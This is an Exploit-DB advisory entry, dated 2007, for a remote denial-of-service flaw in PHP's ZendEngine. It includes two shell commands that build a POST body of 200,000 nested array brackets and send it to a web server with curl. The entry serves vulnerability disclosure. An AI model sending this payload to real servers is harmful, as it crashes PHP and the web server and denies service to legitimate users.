Lucene search

K
exploitdbStefan EsserEDB-ID:29692
HistoryMar 01, 2007 - 12:00 a.m.

PHP 3/4/5 - ZendEngine Variable Destruction Remote Denial of Service

2007-03-0100:00:00
Stefan Esser
www.exploit-db.com
16

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/22764/info

PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.

An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.

This issue affects all versions of PHP. 

$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata

$ curl http://www.example.com/ -d @postdata